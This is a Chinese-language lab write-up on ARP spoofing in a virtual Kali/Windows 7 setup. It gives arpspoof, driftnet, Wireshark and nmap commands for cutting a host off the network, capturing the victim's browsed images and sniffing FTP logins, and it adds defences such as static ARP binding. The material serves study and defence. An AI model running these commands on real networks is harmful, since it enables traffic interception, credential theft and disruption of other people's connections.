ARP协议----连接数据链路层与网络层的桥梁
根据ip地址获取物理地址
ARP欺骗
arp请求为广播形式发送,同一网段内主机可自主发送arp应答消息,欺骗者伪装成网关或被访问主机发送arp应答消息,让目标主机认为被访问主机ip的物理地址就是欺骗者的物理地址;ARP缓存表采用老化的机制,在一段时间里表中的某一行没有使用,就会被删除,这样可以大大减少ARP缓存表的长度,加快查询的速度,也成了arp欺骗利用的机制
实验
一、断网攻击
环境:kali、win7
kali对win7进行arp欺骗
1、kali安装dnsiff网络嗅探工具包
apt-get install dnsiff
2、伪装网关对win7实现断网攻击
arpspoof -i eth0 -t 目标主机 -r 网关ip
win7此时已无法访问网络(linux系统默认禁止ip数据包转发:/proc/sys/net/ipv4/ip_forward)
且arp缓存表网关mac地址已发生变更
二、获得目标主机浏览网页的图片
1、伪装网关对win7实现欺骗
arpspoof -i eth0 -t 目标主机 -r 网关ip
2、kali安装图形捕获工具driftnet
apt-get install driftnet
3、开启允许数据包转发
echo 1 > /proc/sys/net/ipv4/ip_forward
此时win7已正常访问网络,但明显网速下降
4、kaili开启图形捕获
driftnet -i eth0
弹出的driftnet捕获对话框能展示win7浏览网页的图片
三、获取ftp服务器登陆账户密码
1、搭建ftp服务器,创建登陆账号密码,分享目录
2、开启欺骗,允许路由转发
3、使用wireshark进行抓包获取登陆账号密码
防御
1、不把网络安全信任关系单独建立在ip地址/mac地址上,应当ip+mac地址结合
2、设置静态mac-ip地址表,不让主机刷新
3、使用proxy代理ip进行数据传输
4、使用arp服务器(安全可信任),查找自己的arp转换表响应其他机器的arp广播请求
拓展
1、存活主机扫描得到同一网段下其他主机IP
nmap -sP 192.168.1.0/24
2、早期的ftp服务器安全性较低,采用vsftp服务器+虚拟用户模式避免服务器实际用户名及密码泄露,共享目录应严格控制“写”权限
3、若知悉网关mac地址,处于arp欺骗中可以直接进行arp加固,静态绑定网关地址
netsh i i show in
netsh -c "i i" add neighbors 网卡idx add “网关ip 网关mac”
实验均在虚拟环境下进行,本文仅作学习交流使用,禁止用于其他非法行为!!!